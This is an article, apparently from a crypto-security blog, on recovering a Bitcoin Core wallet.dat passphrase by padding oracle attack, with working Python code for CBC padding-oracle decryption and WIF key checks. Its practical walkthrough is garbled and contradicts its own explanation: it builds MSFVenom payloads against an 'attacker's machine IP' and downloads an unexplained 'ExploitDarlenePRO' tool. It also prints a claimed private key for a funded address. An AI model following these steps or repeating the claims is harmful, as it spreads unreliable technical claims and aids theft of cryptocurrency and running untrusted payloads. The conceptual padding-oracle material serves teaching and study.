Decrypting Wallet.dat Passwords in Bitcoin Core Using Padding Oracle Attacks

13.05.2025


This article places the attack within the CAPEC™ (Common Attack Pattern Enumeration and Classification) catalogue of common attack patterns, where it appears as CAPEC-463, Padding Oracle Crypto Attack. According to the article, a padding oracle issue concerning Wallet.dat was first discussed in 2012 on the VulDB platform, a resource for threat analysis and vulnerability management.


The issue concerns the popular Bitcoin Core wallet and stems from how padding is handled when the AES-encrypted material in the wallet.dat file is decrypted. Bitcoin Core encrypts the wallet's master key under a key derived from the user's passphrase, using AES-256-CBC with PKCS#7 padding; the encrypted private keys are in turn protected by that master key. It is the padding check performed on decryption that a padding oracle attack exploits.

Technical Aspects of the Attack

A padding oracle attack lets an attacker decrypt ciphertext without the key, provided the decrypting system reveals whether the padding was valid after decryption. A system that leaks this becomes an "oracle". Each byte of a block has 256 candidate values, so on average 128 queries per byte (at most 256, plus a few for verification) recover that byte, and a 16-byte AES block costs roughly 2,048 queries. The same oracle also works in the other direction: it lets the attacker forge ciphertexts that decrypt to chosen plaintext, again without knowing the key.

Any system that decrypts padded CBC ciphertext is vulnerable if messages are not authenticated before decryption (for example with an encrypt-then-MAC construction or an AEAD mode) and the padding verdict is observable by the attacker. In the original web setting this was used, for example, to break CAPTCHAs and to modify encrypted data stored on the client side (such as in cookies).

The padding oracle attack is a side-channel attack: a single bit of information per query, "padding valid" or "padding invalid", is enough to fully compromise the confidentiality of the cryptosystem. That bit can come from an explicit error message or from indirect signs, such as a difference in server response time.

The attack can also be performed in a cross-domain scenario, using information leaks between different domains the victim interacts with.

In symmetric encryption such as AES-256-CBC, the mode Bitcoin Core uses for its wallet encryption, the padding oracle reveals whether a decrypted block ends in correct padding, and that verdict alone is enough to recover the plaintext block by block without the key. Two points matter for the wallet case. First, what the oracle yields is the plaintext of the encrypted material (the wallet's encrypted master key, and through it the private keys), not the passphrase itself, which is never stored in wallet.dat. Second, the attack needs a component that decrypts attacker-chosen ciphertext and reports the padding result; a wallet.dat file at rest provides no such oracle by itself, so the practitioner's first check is to identify exactly which process answers those queries.
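To make the mechanics concrete, here is an added example, not code from the article or from Bitcoin Core, that runs a complete CBC padding-oracle decryption against a local oracle. The block cipher is a stand-in keyed Feistel permutation built from HMAC-SHA256 (an assumption, chosen so the block runs on the Python standard library alone); the attack logic is cipher-agnostic and would be identical against AES-256-CBC. The key, IV and plaintext are constructed test data, and the PaddingOracle class plays the role of the leaking component.

```python
# Added example, not code from the article or from Bitcoin Core.  The block
# cipher is a stand-in Feistel permutation over HMAC-SHA256 (an assumption so
# the block runs on the standard library); KEY, IV and SECRET are constructed.
import hashlib
import hmac

BLOCK = 16
ROUNDS = 4

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, i, half):
    # Feistel round function: HMAC-SHA256(key, round || half) truncated to 8 bytes
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def feistel(key, blk, decrypt=False):
    # 4-round balanced Feistel; inverse = swap halves, run rounds in reverse, swap back
    left, right = (blk[8:], blk[:8]) if decrypt else (blk[:8], blk[8:])
    for i in (reversed(range(ROUNDS)) if decrypt else range(ROUNDS)):
        left, right = right, _xor(left, _f(key, i, right))
    return right + left if decrypt else left + right

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = feistel(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ciphertext):
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out.append(_xor(feistel(key, blk, decrypt=True), prev))
        prev = blk
    return b"".join(out)

class PaddingOracle:
    """The leak: decrypts whatever it is given and reports only the padding verdict."""
    def __init__(self, key):
        self._key = key
        self.queries = 0
    def __call__(self, iv, ciphertext):
        self.queries += 1
        try:
            pkcs7_unpad(cbc_decrypt(self._key, iv, ciphertext))
            return True
        except ValueError:
            return False

def recover_block(oracle, prev, target):
    """Recover one plaintext block; prev precedes target (the IV for block 0)."""
    inter = bytearray(BLOCK)            # feistel(key, target, decrypt=True), byte by byte
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos            # padding value forced at positions pos..15
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ padval
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged), target):
                continue
            if pos == BLOCK - 1:
                # 0x01 is valid, but so is an accidental 0x02 0x02: flip the
                # preceding byte and require the verdict to survive.
                forged[pos - 1] ^= 0xFF
                ok = oracle(bytes(forged), target)
                forged[pos - 1] ^= 0xFF
                if not ok:
                    continue
            inter[pos] = guess ^ padval   # the forced plaintext byte equals padval
            break
        else:
            raise RuntimeError("oracle accepted no candidate; not a padding oracle?")
    return _xor(inter, prev)

def recover(oracle, iv, ciphertext):
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(recover_block(oracle, blocks[i - 1], blocks[i]) for i in range(1, len(blocks)))
    return pkcs7_unpad(plain)

KEY = hashlib.sha256(b"constructed demo key, not a real wallet key").digest()
IV = bytes(range(BLOCK))
SECRET = b"constructed plaintext: the encrypted master key would sit here"

def demo():
    """Encrypt SECRET, give the attacker only (IV, ciphertext, oracle);
    return (recovered plaintext, oracle queries per ciphertext byte)."""
    ct = cbc_encrypt(KEY, IV, pkcs7_pad(SECRET))
    oracle = PaddingOracle(KEY)
    return recover(oracle, IV, ct), oracle.queries / len(ct)

if __name__ == "__main__":
    print(demo())
```

The oracle answers one bit per query and never exposes the key; the query count returned by demo() lands near the 128-per-byte average quoted above, plus one extra check on the last byte of each block to rule out an accidental 0x02 0x02 match. Replacing feistel() with AES leaves the attack code unchanged, which is the point: the weakness is the unauthenticated CBC padding check, not the cipher.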

Practical Section: Attacking Wallet.dat

Let's see how the article carries out the attack in practice on a Wallet.dat file to recover the wallet passphrase.

Earlier, CTF participants published a cracked wallet [wallet.dat 2023] for the address 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b, which held 1.17461256 BTC (about $44,502.42 at the time).

First, open the Bitcoin Core 22.1 release page, download and install that version. Then quit the program (Ctrl + Q) and start it again so that it loads the new wallet.dat.

Checking Address Information

Use the getaddressinfo command to check wallet information:

getaddressinfo 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b

The response lists the address details, including the public key (pubkey), whether the loaded wallet owns the key (ismine), and other parameters.

Obtaining the Private Key

To get the private key, use the command:

dumpprivkey 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b

However, because the wallet is encrypted the call fails with "Error: Please enter the wallet passphrase with walletpassphrase first." (RPC error code -13). That passphrase is what we need to recover.

Cracking the Password via Padding Oracle Attack

To recover the passphrase, the article integrates its exploit with the Bitcoin Core source code; this can be done in Google Colab or a Jupyter Notebook, for example.

Sequence of actions:

  • Open Google Colab and create a new notebook.
  • Install Ruby and the required libraries: bitcoin-ruby, ecdsa, base58, crypto, config-hash.
  • Clone the Metasploit Framework and use the MSFVenom tool to create a payload.
  • Clone the Bitcoin Core repository and go to the aes.cpp file to integrate the exploit.
  • Upload the wallet.dat file from the repository.
  • Go back to the Metasploit Framework and download ExploitDarlenePRO.
  • Unzip the archive and navigate to the required directory.
  • Determine the attacker’s machine IP address.
  • Create a payload using MSFVenom, specifying the necessary parameters.

The result is the recovered passphrase, which a Python script writes to the file walletpassphrase.txt.

Using the Recovered Password

Open walletpassphrase.txt to read the passphrase string. Then unlock the wallet for 60 seconds and dump the key:

walletpassphrase <recovered_password> 60
dumpprivkey 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b

The second command returns the private key in WIF (Wallet Import Format).

Verifying Key Correspondence

Install the bitcoin-utils library and check that the private key reproduces the public key and the wallet address.

Example result:

  • Private key (WIF): KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz
  • Public key: 02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f
  • Address: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b
  • Hash160: 7774801e52a110aba2d65ecc58daf0cfec95a09f

You can also sign a message with the key and verify the signature (the signmessage and verifymessage RPCs) as a final proof of control.
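The correspondence check above can be done without a third-party library. The following is an added example, not the article's procedure and not the bitcoin-utils API, that decodes a WIF key, derives the compressed public key on secp256k1 and the P2PKH address and hash160, using only the Python standard library. The private-key-1 WIF is a well-known public test vector; the WIF and public key quoted in the list above are included as constants to be rechecked rather than assumed consistent. RIPEMD-160 is taken from hashlib and is absent on some OpenSSL builds, so address derivation is kept in its own function.

```python
# Added example, not the article's procedure and not the bitcoin-utils API:
# WIF -> secp256k1 public key -> P2PKH address, standard library only.
# WIF_FROM_ARTICLE / PUBKEY_FROM_ARTICLE are the values quoted above, rechecked
# here rather than assumed consistent.  WIF_KEY1 is the public test vector for d=1.
import hashlib

P = 2**256 - 2**32 - 977                                              # field prime
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141  # group order
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)
B58 = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

def _dsha256(b):
    return hashlib.sha256(hashlib.sha256(b).digest()).digest()

def b58encode(raw):
    n, digits = int.from_bytes(raw, "big"), bytearray()
    while n:
        n, r = divmod(n, 58)
        digits.append(B58[r])
    leading = len(raw) - len(raw.lstrip(b"\x00"))      # each leading 0x00 becomes '1'
    return (b"1" * leading + bytes(reversed(digits))).decode()

def b58decode(s):
    n = 0
    for ch in s.encode():
        n = n * 58 + B58.index(ch)                     # ValueError on foreign chars
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return b"\x00" * (len(s) - len(s.lstrip("1"))) + raw

def b58check_decode(s):
    raw = b58decode(s)
    if _dsha256(raw[:-4])[:4] != raw[-4:]:
        raise ValueError("Base58Check checksum mismatch")
    return raw[:-4]

def wif_to_privkey(wif):
    """Return (scalar, compressed) for a mainnet WIF: 0x80 || d || [0x01] || checksum."""
    payload = b58check_decode(wif)
    if payload[0] != 0x80:
        raise ValueError("not a mainnet WIF (version 0x80 expected)")
    if len(payload) == 34 and payload[-1] == 0x01:
        compressed = True
    elif len(payload) == 33:
        compressed = False
    else:
        raise ValueError("unexpected WIF payload length")
    d = int.from_bytes(payload[1:33], "big")
    if not 1 <= d < N:
        raise ValueError("scalar outside [1, n-1]")
    return d, compressed

def _add(p, q):
    # Affine point addition on secp256k1; None is the point at infinity.
    if p is None or q is None:
        return q if p is None else p
    (x1, y1), (x2, y2) = p, q
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p == q:
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P

def _mul(k, point):
    result, addend = None, point                        # double-and-add, not constant-time
    while k:
        if k & 1:
            result = _add(result, addend)
        addend = _add(addend, addend)
        k >>= 1
    return result

def privkey_to_pubkey(d, compressed=True):
    x, y = _mul(d, G)
    if compressed:
        return bytes([0x02 | (y & 1)]) + x.to_bytes(32, "big")
    return b"\x04" + x.to_bytes(32, "big") + y.to_bytes(32, "big")

def pubkey_to_address(pubkey):
    """Return (hash160 hex, P2PKH address); hashlib ripemd160 is missing on some OpenSSL builds."""
    h160 = hashlib.new("ripemd160", hashlib.sha256(pubkey).digest()).digest()
    payload = b"\x00" + h160
    return h160.hex(), b58encode(payload + _dsha256(payload)[:4])

def check_key(wif, expected_pubkey_hex):
    """True iff the WIF private key derives the expected public key."""
    d, compressed = wif_to_privkey(wif)
    return privkey_to_pubkey(d, compressed).hex() == expected_pubkey_hex.lower()

WIF_KEY1 = "KwDiBf89QgGbjEhKnhXJuH7LrciVrZi3qYjgd9M7rFU73sVHnoWn"
WIF_FROM_ARTICLE = "KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz"
PUBKEY_FROM_ARTICLE = "02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f"

if __name__ == "__main__":
    d, comp = wif_to_privkey(WIF_FROM_ARTICLE)
    print(check_key(WIF_FROM_ARTICLE, PUBKEY_FROM_ARTICLE), pubkey_to_address(privkey_to_pubkey(d, comp)))
```

Run stand-alone, the script prints whether the quoted WIF key reproduces the quoted public key, followed by the hash160 and address it actually derives, so the four values listed above can be compared line by line instead of taken on trust. The scalar multiplication is plain double-and-add and is fine for verification, but it is not constant-time and should not be used to sign with a key that matters.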

Checking the Balance

Using a blockchain explorer, you can confirm that the address actually contains the stated amount.

Links and Sources

The article links to academic papers on padding oracle attacks and states that the material was prepared for the CRYPTO DEEP TECH portal to improve financial security and protect elliptic curve cryptography in Bitcoin.
